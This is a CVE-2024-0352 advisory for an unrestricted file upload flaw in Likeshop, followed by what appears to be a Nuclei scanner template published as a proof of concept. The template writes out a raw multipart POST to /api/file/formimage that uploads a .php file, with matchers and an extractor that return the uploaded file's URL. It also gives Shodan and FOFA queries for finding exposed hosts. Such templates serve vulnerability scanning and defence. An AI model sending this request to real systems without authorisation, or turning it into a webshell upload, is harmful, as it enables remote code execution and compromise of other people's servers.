A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
PoC代码[已公开]
id: CVE-2024-0352
info:
name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
author: CookieHanHoan,babybash,samuelsamuelsamuel
severity: critical
description: |
A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
impact: |
The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
remediation: Update to the latest version
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-0352
- https://note.zhaoj.in/share/ciwYj7QXC4sZ
- https://vuldb.com/?ctiid.250120
- https://vuldb.com/?id.250120
- https://github.com/tanjiti/sec_profile
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-0352
cwe-id: CWE-434
epss-score: 0.91804
epss-percentile: 0.99676
cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: likeshop
product: likeshop
shodan-query: http.favicon.hash:874152924
fofa-query: icon_hash=874152924
tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive,vkev
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
POST /api/file/formimage HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="{{filename}}.php"
Content-Type: application/x-php
{{randstr}}
------WebKitFormBoundarygcflwtei--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "\"name\":\"{{filename}}.php\"")'
- 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
condition: and
extractors:
- type: json
part: body
json:
- ".data.url"
# digest: 4a0a004730450220171ce2c46c65e885702fb66f5d42074db9413dc299caf6790d391ffa5b8740ad022100e68ccb237b3afcb3c46629a7ae609050cd229d74be4d3e9a3607f282f19b232d:922c64590222798bb761d5b6d8e72950